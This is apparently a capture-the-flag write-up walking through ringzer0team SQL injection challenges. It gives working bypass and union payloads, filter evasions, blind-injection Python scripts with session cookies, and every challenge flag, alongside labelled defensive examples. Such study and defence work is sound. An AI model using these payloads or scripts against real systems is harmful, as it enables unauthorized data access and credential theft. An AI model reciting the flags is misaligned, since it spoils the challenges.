Beginner's Treat: A Journey Through SQL Injection

Posted by 网络空间安全社


Preface

 
https://ringzer0team.com

Most basic SQLi pattern.(point 1)

Warm-up:

 
username: admin'#
password: 1

This gives the flag: FLAG-238974289383274893

ACL rulezzz the world.(point 2)

A quick test:

 
username=admin'

gives

 
You have an error in your SQL syntax; check the manual that corresponds to your mysql server version for the right syntax to use near ''admin''' at line 4

Close the quote and comment out the rest:

 
username=admin' or 1#

Flag: FLAG-sdfoip340e89rfuj34woit

Login portal 1(point 2)

The following are filtered:

 
#
--
=

I didn't test anything else; this passes straight away:

 
username=admin' or 'a' like 'a&password=1

which gives the flag: FLAG-4f885o1dal0q1huj6eaxuatcvn

Random Login Form(point 2)

A quick try at second-order injection didn't look right, so I went for length truncation instead. Register with:

 
username=admin                                    1
password=1

then log in with:

 
username=admin
password=1

Flag: FLAG-0Kg64o8M9gPQfH45583Mc0jc3u
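Why the padded username works, and how a registration handler should defend against it, as an added example that is not part of the original writeup. It models in sqlite3 what the challenge's backend presumably does: the app checks whether the submitted name already exists, then the database silently truncates the stored value to the column length (what a permissive-mode VARCHAR(20) does), and a PAD SPACE collation treats 'admin' and 'admin   ' as equal at login. The schema, the 20-character limit and the rtrim() emulation of PAD SPACE are assumptions for the demo; the safe variant canonicalises and length-checks the name before it ever touches the table.

```python
import sqlite3

USERNAME_MAX = 20  # assumed column width, i.e. VARCHAR(20)


def make_db():
    # Constructed schema: no UNIQUE constraint, uniqueness is "checked" by the app.
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (username TEXT, password TEXT)")
    db.execute("INSERT INTO users VALUES ('admin', 'real-admin-secret')")
    return db


def login(db, username, password):
    # rtrim() on both sides emulates a MySQL PAD SPACE collation, where
    # trailing spaces are ignored when two strings are compared.
    row = db.execute(
        "SELECT username FROM users "
        "WHERE rtrim(username) = rtrim(?) AND password = ?",
        (username, password),
    ).fetchone()
    return row is not None


def register_vulnerable(db, username, password):
    """Existence check on the raw value, then the stored copy is cut to
    USERNAME_MAX the way a non-strict VARCHAR column silently truncates."""
    exists = db.execute(
        "SELECT 1 FROM users WHERE rtrim(username) = rtrim(?)", (username,)
    ).fetchone()
    if exists:
        return False
    db.execute("INSERT INTO users VALUES (?, ?)",
               (username[:USERNAME_MAX], password))
    return True


def register_safe(db, username, password):
    """Canonicalise first (strip, enforce the column length) and compare the
    exact value that will be stored, so no later truncation can change it."""
    canon = username.strip()
    if not canon or len(canon) > USERNAME_MAX:
        return False
    exists = db.execute(
        "SELECT 1 FROM users WHERE rtrim(username) = ?", (canon,)
    ).fetchone()
    if exists:
        return False
    db.execute("INSERT INTO users VALUES (?, ?)", (canon, password))
    return True


def demo():
    padded = "admin" + " " * 36 + "1"   # constructed: the writeup's registration value
    db = make_db()
    registered = register_vulnerable(db, padded, "1")   # passes the check
    hijacked = login(db, "admin", "1")                  # attacker's row matches 'admin'
    db2 = make_db()
    rejected = register_safe(db2, padded, "1")          # too long: refused
    return registered, hijacked, rejected, login(db2, "admin", "1")
```

The interesting value is the second one: after the vulnerable registration, logging in as admin with the attacker's password succeeds because the truncated row compares equal to the real account.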

Just another login form(point 2)

A few attempts got nowhere, so I tried a union injection:

 
username = admin' union select md5(1),md5(1),md5(1)#
password = 1

The response was: Bad search filter
A search showed this is an LDAP-specific error, so I logged in with:

 
username = *
password = *

Flag: FLAG-38i65201RR4B5g1oAm05fHO0QP
This is a point worth studying; noted. It rarely shows up in recent SQL injection challenges; I remember it appearing in an XCTF league round before.

Po po po po postgresql(point 2)

A quick try:

 
username=admin' or 'a' like 'a&password=1

Response:

 
ERROR:  invalid input syntax for type boolean: "admin"
LINE 1: SELECT * FROM users WHERE (username = ('admin' or 'a' like '...

So close the parenthesis:

username=admin') or 'a' like 'a') -- &password=1


Flag: FLAG-mdeq68jNN88xLB1o2m8V33Ld

Don't mess with Noemie; she hates admin!(point 3)

Try:

 
username = admin' or sleep(5) or 'a' like 'a

The sleep fired, so the quote closes correctly. Go straight for it:

 
username = admin' or 'a' like 'a

Login failed, so guess the backend query:

$sql = select * from users where username='$username' and password = '$password'

So we try:

 
username = 1' or 1 or '
password = 1

Substituting gives:

 
select * from users where username='1' or 1 or '' and password = '1'

which bypasses the check.
Flag: FLAG-Yk3Hfovvb5kALU9hI2545MaY

What's the definition of NULL(point 3)

The URL is ?id=MQ==, which is obviously base64; decoding gives id=1. A quick test:

 
id = 1'#
id = MScj

gives

 
SQLite Database error please try again later.

I then tested for a long time with no result. Going back to the start, I remembered the challenge gives a hint:

 
Hint WHERE (id IS NOT NULL) AND (ID = ? AND display = 1)

So the backend SQL really is written like this:

WHERE (id IS NOT NULL) AND (ID = base64_decode($_GET[id]) AND display = 1)

Construct:

 
0) OR (ID IS NULL) OR (1=2

Substituting gives:

 
WHERE (id IS NOT NULL) AND (ID = 0) OR (ID IS NULL) OR (1=2 AND display = 1)

Encode it:

 
?id=MCkgT1IgKElEIElTIE5VTEwpIE9SICgxPTI=

Flag: FLAG-sQFYzqfxbZhAj04NyCCV8tqA
This one is quite interesting too and worth studying.

Login portal 2(point 3)

Straight away try:

 
username = 1' or 1 or '
password = 1

the usual trick. Response:

Wrong password for impossibletoguess.


impossibletoguess looks suspicious. It is probably a username, and it is echoed back, so try a union:

 
username = 1' union select 1,2#
password = 1

Response:

 
Wrong password for 1.

The rest is standard union injection:

 
1' union select (select group_concat(TABLE_NAME) from information_schema.TABLES where TABLE_SCHEMA=database()),2#
Wrong password for users.
1' union select (select group_concat(COLUMN_NAME) from information_schema.COLUMNS where TABLE_NAME='users'),2#
Wrong password for username,password.
1' union select (select username from users limit 0,1),2#
Wrong password for impossibletoguess.
1' union select (select password from users limit 0,1),2#
Wrong password for 1b2f190ad705d7c2afcac45447a31b053fada0c4.

A 40-character password hash is clearly not MD5; guess SHA-1. Union injection:

 
username = impossibletoguess' union select sha1(1),sha1(1)#
password = 1

Login succeeds; flag: FLAG-wlez73yxtkae9mpr8aerqay7or

Quote of the day(point 4)

Quick test of the id:

 
?q=2'
No result found for id "2'"

The value is echoed back. Trying a union, I found spaces are filtered; %0a gets around that:

 
?q=2%0aunion%0aselect%0a1,2#
Quote of the day: No one forgives with more grace and love than a child.
Quote of the day: 2

Then the usual routine:

 
?q=2%0aunion%0aselect%0a1,(select%0agroup_concat(TABLE_NAME)%0afrom%0ainformation_schema.TABLES%0awhere%0aTABLE_SCHEMA=database())#
Quote of the day: No one forgives with more grace and love than a child.
Quote of the day: alkdjf4iu,quotes
?q=2%0aunion%0aselect%0a1,(select%0agroup_concat(COLUMN_NAME)%0afrom%0ainformation_schema.COLUMNS%0awhere%0aTABLE_NAME=0x616c6b646a66346975)#
Quote of the day: No one forgives with more grace and love than a child.
Quote of the day: id,flag
?q=2%0aunion%0aselect%0a1,(select%0aflag%0afrom%0aalkdjf4iu%0alimit%0a0,1)#
Quote of the day: No one forgives with more grace and love than a child.
Quote of the day: FLAG-bB6294R6cmLUlAu6H71sTd2J

over~

Thinking outside the box is the key(point 4)

Quick try:

 
?id=2'

gives

 
SQLite Database error please try again later.

So it's SQLite. Continue testing:

 
?id=2 and 1=2 union select 1,2 from sqlite_master
2
?id=2 and 1=2 union select 1,sqlite_version() from sqlite_master
3.8.7.1
?id=2 and 1=2 union select 1,((select name from sqlite_master where type='table' limit 0,1)) from sqlite_master
random_stuff

Repeating with increasing offsets gives all the table names:

 
random_stuff
ajklshfajks
troll
aatroll

I picked ajklshfajks; from earlier experience the column should be flag:

 
?id=2 and 1=2 union select 1,((select flag from ajklshfajks limit 0,1)) from sqlite_master
FLAG-13lIBUTHNFLEprz2KKMx6yqV

over~

No more hacking for me!(point 4)

What a trap: the page source (F12) explains it:

 
<!-- l33t dev comment: -->
<!-- No more hacking attempt we implemented the MOST secure filter -->
<!-- urldecode(addslashes(str_replace("'", "", urldecode(htmlspecialchars($_GET['id'], ENT_QUOTES))))) -->

No wonder I couldn't solve it :(
Once you notice this it's easy:

 
http://ringzer0team.com/challenges/74/?id=0%252527 union all select 1,tbl_name,3 FROM sqlite_master WHERE type=%252527table%252527  limit 0,1 -- 
http://ringzer0team.com/challenges/74/?id=0%252527 union all select 1,sql,3 FROM sqlite_master WHERE type=%252527table%252527  and tbl_name=%252527random_data%252527 limit 0,1 --
random_data  CREATE TABLE random_data (id int, message varchar(50), display int)
http://ringzer0team.com/challenges/74/?id=0%252527 union all select 1,message,3 FROM random_data limit 2,1 --

which gives the flag:

FLAG-ev72V7Q4a1DzYRw5fxT71GC815JE
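The "MOST secure filter" in the dev comment fails for one reason: it URL-decodes again *after* it has stripped quotes and added slashes, so anything the earlier steps could not see is reconstituted at the end. This added example (not from the writeup) re-implements the PHP chain in Python, feeds it the value PHP would hand over in $_GET for a double-encoded id, and shows the ordering fix: decode to a fixed point first, then sanitise once. The PHP functions are emulated with stdlib equivalents (`html.escape` for htmlspecialchars, a small addslashes); that emulation is an assumption. Ordering only removes this bypass; bound parameters remain the actual fix for the query.

```python
import html
from urllib.parse import unquote


def addslashes(s):
    """Emulates PHP addslashes(): backslash before ' " \\ and NUL."""
    return "".join("\\" + c if c in "'\"\\\x00" else c for c in s)


def leet_filter(get_id):
    """The dev comment's chain, applied to $_GET['id'], which PHP has
    already URL-decoded once by the time the script sees it."""
    step = html.escape(get_id, quote=True)   # htmlspecialchars(..., ENT_QUOTES)
    step = unquote(step)                     # urldecode
    step = step.replace("'", "")             # str_replace("'", "", ...)
    step = addslashes(step)                  # addslashes
    return unquote(step)                     # urldecode AGAIN, after sanitising


def decode_fixpoint(value, max_rounds=5):
    """Undo layered URL-encoding until the value stops changing."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def sanitize_after_decoding(get_id):
    """Same checks as the filter, but run once on the fully decoded value,
    with no decoding step after them."""
    value = decode_fixpoint(html.escape(get_id, quote=True))
    return addslashes(value.replace("'", ""))


# Constructed inputs: what $_GET['id'] holds for ?id=0%2527 and ?id=0%252527
SINGLE_ENCODED = "0%27"      # one layer left after PHP's own decode
DOUBLE_ENCODED = "0%2527"    # two layers left after PHP's own decode


def demo():
    return {
        "filter(single)": leet_filter(SINGLE_ENCODED),         # quote removed
        "filter(double)": leet_filter(DOUBLE_ENCODED),         # quote comes back
        "fixed(double)": sanitize_after_decoding(DOUBLE_ENCODED),
    }
```

The second entry is the bug: the filter's final urldecode turns `%27` into a bare quote after the quote-stripping step has already run.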

Quote of the day reloaded(point 5)

This one felt a bit like a guessing game, or maybe I missed something. After lots of trial and error, this worked:

 
?q=3\&s=ununionion select 1,2%23
Quote of the day: Famous remarks are very seldom quoted correctly.
Quote of the day: 2

union has to be written twice to get past the filter:

 
?q=3\&s=ununionion%20select%201,(select%20group_concat(TABLE_NAME)%20from%20information_schema.TABLES%20where%20TABLE_SCHEMA=database())%23
Quote of the day: Famous remarks are very seldom quoted correctly.
Quote of the day: qdyk5,quotes
?q=3\&s=ununionion%20select%201,(select group_concat(COLUMN_NAME) from information_schema.COLUMNS where TABLE_NAME=0x7164796b35)%23
Quote of the day: Famous remarks are very seldom quoted correctly.
Quote of the day: id,flag
?q=3\&s=ununionion%20select%201,(select flag from qdyk5 limit 0,1)%23
Quote of the day: Famous remarks are very seldom quoted correctly.
Quote of the day: FLAG-enjlleb337u17K7yLqZ927F3

over~
(Note: although I solved it, I'm still puzzled; the logic doesn't feel connected and I found this by random trial = =)
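The two "Quote of the day" challenges show why keyword filters are a poor control: one strips spaces (defeated with %0a) and the other deletes `union` once (defeated by writing it twice), and "No more hacking for me!" adds a double-encoding layer. An added example of the detection side (mine, not the writeup's): normalise each request parameter (decode URL-encoding to a fixed point, fold all whitespace, lower-case) and then *score* indicators instead of removing them. The request lines and the scoring weights are constructed for the demo; the indicators match as plain substrings on purpose so that a doubled keyword still counts.

```python
import re
from urllib.parse import parse_qs, unquote_plus, urlsplit


def normalize(value, rounds=3):
    """Undo layered URL-encoding, then fold every whitespace character
    (including the %0a newline used instead of spaces) into one space."""
    for _ in range(rounds):
        decoded = unquote_plus(value)
        if decoded == value:
            break
        value = decoded
    return re.sub(r"\s+", " ", value).lower()


# (pattern, weight). Substring matches, no word boundaries: "ununionion"
# must still score, unlike with a filter that deletes the keyword once.
INDICATORS = [
    (r"union", 2),
    (r"select", 2),
    (r"information_schema|sqlite_master", 3),
    (r"sleep\s*\(|benchmark\s*\(", 3),
    (r"'\s*(or|and)\b", 2),
    (r"--|#|/\*", 1),
]
THRESHOLD = 4  # a lone keyword ("family reunion") stays below it


def score(value):
    n = normalize(value)
    return sum(w for pat, w in INDICATORS if re.search(pat, n))


def strip_union_once(value):
    """The remove-once filter the reloaded challenge appears to use: deleting
    the inner 'union' of 'ununionion' leaves 'union' behind."""
    return re.sub(r"union", "", value, count=1, flags=re.I)


def suspicious_params(request_line):
    """(name, score) for every query parameter of a GET request line that
    reaches THRESHOLD; request_line looks like 'GET /path?q=... HTTP/1.1'."""
    path = request_line.split(" ")[1]
    hits = []
    for name, values in parse_qs(urlsplit(path).query, keep_blank_values=True).items():
        for v in values:
            s = score(v)
            if s >= THRESHOLD:
                hits.append((name, s))
    return hits


# Constructed request lines: the writeup's three evasions plus two benign ones.
SAMPLE_REQUESTS = [
    "GET /challenges/?q=2%0aunion%0aselect%0a1,2%23 HTTP/1.1",
    "GET /challenges/?q=3%5C&s=ununionion%20select%201,2%23 HTTP/1.1",
    "GET /challenges/74/?id=0%252527%20union%20all%20select%201,tbl_name,3%20FROM%20sqlite_master HTTP/1.1",
    "GET /challenges/?q=7 HTTP/1.1",
    "GET /search?q=family+reunion+photos HTTP/1.1",
]


def scan(requests=SAMPLE_REQUESTS):
    return [(line, suspicious_params(line)) for line in requests]
```

Run `scan()` and the three attack lines come back with a flagged parameter while the two benign ones do not; `strip_union_once("ununionion")` returns `"union"`, which is the whole reason the double-write works against a sanitiser and not against a scorer.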

Hot Single Mom(point 6)

The description:

 
Get laid or get lazy it's up to you 
Find online hot single Mom

Clearly not a serious challenge, and sure enough the site is down. But it gives the source of the challenge: GoSecure CTF 2014. A search turned up:

 
https://gist.github.com/h3xstream/3bc4f264cc911e37f0d6

It should be a decent injection challenge.
Flag: FLAG-wBGc5g147MuVQuC28L9Tw8H8HF

Login portal 3(point 6)

I used blind injection for this one, but it's the first challenge where I needed it, so I don't know whether I made it harder than necessary. The script:

import requests
import string

url = "https://ringzer0team.com/challenges/5"
cookie = {
    "PHPSESSID": "27vctgun5jjk5ou82oqv9clog2",
    "_ga": "GA1.2.1724649637.1519735081",
    "_gid": "GA1.2.933125333.1519735081",
}
flag = ""
for i in range(1, 1000):  # position in the value being extracted
    print("i:", i)
    for j in range(33, 127):  # candidate ASCII code for that position
        # for j in "0123456789" + string.ascii_letters + "-_!@#$^&*()={}":
        data = {
            # earlier stages, used one at a time (result in trailing comment):
            # "username": "1' or (substr((database()),%s,1)='%s') and 'a'='a" % (i, j),  # login3
            # "username": "1' or (substr((select group_concat(TABLE_NAME) from information_schema.TABLES where TABLE_SCHEMA=database()),%s,1)='%s') and 'a'='a" % (i, j),  # users
            # "username": "1' or (substr((select group_concat(COLUMN_NAME) from information_schema.COLUMNS where TABLE_NAME=0x7573657273),%s,1)='%s') and 'a'='a" % (i, j),  # username,password
            "username": "1' or (ascii(substr((select password from users limit 0,1),%s,1))=%s) and 'a'='a" % (i, j),
            "password": "1",  # result: SQL1nj3ct10nFTW
        }
        r = requests.post(url=url, data=data, cookies=cookie)
        # oracle: this response text means the candidate for position i is right
        if "Invalid username / password" in r.text:
            flag += chr(j)
            print(flag)
            break

I didn't enumerate the column names; knowing the pattern, I guessed password and got it first try. Final password:

SQL1nj3ct10nFTW

Log in to get the flag: FLAG-vgnvokjmi3fgx0s23iv5x8n2w2

When it's lite it's not necessarily easy(point 6)

Quick test:

 
username = 1' or sleep(5) or 'a'='a
password = 1

The error:

 
SQLite Database error please try again later. Impossible to fetch username & password from users table

That saves effort: the error gives away both the table and the column names, so go straight to blind-injecting password:

import requests
import string

url = "https://ringzer0team.com/challenges/19"
cookie = {
    "PHPSESSID": "27vctgun5jjk5ou82oqv9clog2",
    "_ga": "GA1.2.1724649637.1519735081",
    "_gid": "GA1.2.933125333.1519735081",
}
flag = ""
for i in range(1, 1000):  # position in the password being extracted
    print("i:", i)
    for j in "0123456789" + string.ascii_letters + "-_!@#$^&*()={}":
        data = {
            "username": "1' or (substr((select password from users limit 0,1),%s,1)='%s') and 'a'='a" % (i, j),
            "password": "1",  # result: 4dm1nzP455
        }
        r = requests.post(url=url, data=data, cookies=cookie)
        # oracle: this response text means the candidate for position i is right
        if "Invalid username / password" in r.text:
            flag += j
            print(flag)
            break

Password:

4dm1nzP455

Log in to get the flag: FLAG-rL4t5LRMwjacD82G9vpAd6Gm

Internet As A Service(point 7)

After a lot of testing, the payload:

 
/?s = 1'<0e0union select 1,2,3#

Then the usual routine:

 
?s=1'<0e0union select 1,2,SCHEMA_NAME from information_schema.SCHEMATA limit 1,1#
iaas
?s=1'<0e0union select 1,2,TABLE_NAME from information_schema.TABLES where TABLE_SCHEMA like 0x69616173 limit 0,1#
iaas
rz_flag
?s=1'<0e0union select 1,2,COLUMN_NAME from information_schema.COLUMNS where TABLE_NAME like 0x727a5f666c6167 limit 0,1#
flag
?s=1'<0e0union select 1,2,flag from rz_flag limit 0,1#
FLAG-0f6Ie30uNz4Dy7o872e15lXLS2NKO1uj

over~~

Login portal 4(point 7)

This one used time-based blind injection. The script:

import requests

url = "https://ringzer0team.com/challenges/6"
cookie = {
    "PHPSESSID": "vtqgjp8amva1fsr6eolee70af4",
    "_ga": "GA1.2.1724649637.1519735081",
    "_gid": "GA1.2.933125333.1519735081",
    "_gat": "1",
}
flag = ""
for i in range(1, 1000):  # position in the password being extracted
    for j in range(33, 127):  # candidate ASCII code for that position
        print("i:", i, "j:", j)
        data = {
            "username": "1' || if((ascii(substr((select password from users limit 0,1),%s,1))=%s),sleep(3),1) || '" % (i, j),
            "password": "1",
        }
        try:
            # a 2.5 s timeout is shorter than sleep(3), so a timeout is the oracle
            r = requests.post(url=url, data=data, cookies=cookie, timeout=2.5)
        except requests.exceptions.Timeout:  # only a timeout counts as a hit
            flag += chr(j)
            print(flag)
            break

Password:

UrASQLi1337!

Log in to get the flag:

FLAG-70ygerntbicjdzrxmm0rmk0xx2
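The three blind-injection scripts above (Login portal 3, "When it's lite" and Login portal 4) all leave the same footprint in a login log, whatever the payload text: one session firing dozens of POSTs within seconds, each with a different username value, none succeeding, and in the time-based variant a handful of responses that take about as long as the injected sleep. This added example (mine, not the writeup's) detects that behaviour from the events alone, without keyword matching. The event records, window sizes and thresholds are constructed for the demo; the probe usernames are placeholders standing in for the injected expressions.

```python
from collections import defaultdict


def constructed_events():
    """(session_id, t_seconds, username_field, success, latency_ms) records.
    "s-probe" mimics a blind-injection loop; "s-human" is a user who mistypes
    a password twice and then gets in."""
    events = []
    t = 0.0
    for i in range(1, 5):          # four character positions ...
        for j in range(10):        # ... ten candidates each
            hit = (j == 7)         # the matching candidate triggers the slow path
            events.append(("s-probe", t, "probe-%d-%d" % (i, j), False,
                           3000 if hit else 120))
            t += 0.3
    events += [("s-human", 5.0, "alice", False, 110),
               ("s-human", 12.0, "alice", False, 130),
               ("s-human", 20.0, "alice", True, 115)]
    return events


def analyse(events, window=60.0, min_attempts=20, slow_ms=2500, min_slow=3):
    """Per session: flag "enumeration" when a sliding window holds at least
    min_attempts failed logins with almost all-distinct username values, and
    "time-based" when several responses exceed slow_ms."""
    by_session = defaultdict(list)
    for sid, t, user, ok, ms in events:
        by_session[sid].append((t, user, ok, ms))
    verdicts = {}
    for sid, rows in by_session.items():
        rows.sort()
        flags = set()
        start = 0
        for end in range(len(rows)):
            while rows[end][0] - rows[start][0] > window:
                start += 1
            chunk = rows[start:end + 1]
            if len(chunk) >= min_attempts:
                distinct = len({r[1] for r in chunk})
                if distinct >= 0.9 * len(chunk) and not any(r[2] for r in chunk):
                    flags.add("enumeration")
        if sum(1 for r in rows if r[3] >= slow_ms) >= min_slow:
            flags.add("time-based")
        verdicts[sid] = sorted(flags)
    return verdicts
```

`analyse(constructed_events())` flags the probing session on both counts and leaves the human one clean; in production the same two signals (attempt rate with distinct inputs, and repeated slow responses tied to one session) are what a rate limit and a latency alert should key on.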

Afterword

This is just me getting the ball rolling. With my limited ability I could only give solutions for most of the challenges; some interesting ones remain for everyone to dig into. Looking forward to the masters' tricks~ Orz



